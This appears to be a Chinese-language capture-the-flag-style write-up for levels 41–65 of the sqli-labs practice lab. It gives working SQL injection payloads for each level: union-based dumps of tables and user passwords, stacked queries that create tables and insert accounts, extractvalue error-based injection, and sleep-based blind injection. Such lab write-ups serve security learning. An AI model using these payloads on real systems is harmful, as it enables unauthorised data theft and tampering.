sqli-labs (41-65)

less-41

只有输入id=1才会出现回显，尝试输入 ?id=0 union select 1,1,1 成功回显

爆库:

id=0 union select 1,1,database()

爆表：

id=0 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='security'

爆列:

id=0 union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users'

爆值:

id=0 union select 1,1,group_concat(username,password) from users

less-42

查看源码:

图片.png

Password变量在post过程中，没有通过mysql_real_escape_string()函数的处理。
用户名可以随意填写，
密码我们可以构造进行注入。

通过伪造表查看数据列名

在密码栏填写:

a';creat table less42 like users#

创建成功后发现，users表中数据列名为id,username,password
以此类推，只需插入数据(或者更新数据)即可

a';insert into users (username,password) values ('a','a')#

图片.png

less-43

先用同样的方法测试，就用less42的方法，
注入语句：a';creat table less43 like users#

图片.png

发现报错
根据报错提示，只需在less-42的基础上加一个括号，即：

a');creat table less43 like users#

以此类推，同less-42

less-44

同less-42,只不过没有报错回显，我们只能通过查看数据库来判断是否注入成功
通过测试，发现和less42一样。

less-45

集结了less-44和less-43，即报错不回显，测试方法同less-44,盲注，观察数据库，注入方法和less-43一样。

less-46

借鉴于博客
尝试?sort=1 desc或者asc，显示结果不同，则表明可以注入。
爆表：

http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))%20--+

图片.png

爆列：

http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)))--+

图片.png

爆值：

localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select group_concat(username,password) from users)))--+

图片.png

less-47
输入?sort=1,回显正常，输入?sort=1',报错

图片.png

根据报错提示，显示为单引号,故
爆表：

http://localhost/sqli-labs/Less-47/?sort=1%27%20and%20extractvalue(1,concat(0x7,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))--+

以此类推。
less-48
http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)
http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)

图片.png
less-49
延时注入：
http://localhost/sqli-labs/Less-49/index.php?sort=1%27%20and%20(If(ascii(substr((select%20username%20from%20users%20where%20id=1),1,1))=115,0,sleep(5)))--+
或者如less-48
less-50
http://localhost/sqli-labs/Less-50/?sort=1;create%20table%20less50%20like%20users
less-51
http://localhost/sqli-labs/Less-51/?sort=1%27;create%20table%20less51%20like%20users--+
less-52
http://localhost/sqli-labs/Less-52/?sort=1;create%20table%20less52%20like%20users--+
less-53
?sort=1%27;create%20table%20less53%20like%20users–+
less-54
爆表：
http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+
爆列：
http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gxdghjy72p%27--+
爆值：
http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(secret_X79M)%20from%20gxdghjy72p--+
less-55
多一个括号?id=0) 次数为14次
less-56
思路同上54 ,只不过多一个括号?id=0') 次数为14次
less-57
思路同上，只不过 id=”.$id.” 这里进行了双引号闭合
?id=-1”union select 1,1,group_concat(table_name) from information_schema.tables where table_schema=’challenges’%23
less-58
尝试了查询database() 不返回数据。
那就只能试试报错注入了
?id=0’union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
less-59
同上，只不过没有单引号
?id=0 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
less-60
同上，只不过多了双引号和括号?id=0”)
?id=0”) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+

less-61
同上，只不过多了两个括号和一个双引号?id=0’))
?id=0’)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+

less-62
union和报错注入失效
使用延时注入
?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

less-63
同上62,只不过是单引号
?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--++
正确时间短，错误时间长

less-64
同上63,只不过是双括号
?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短，错误时间长

less-65
同上，只不过?id=1”)
?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+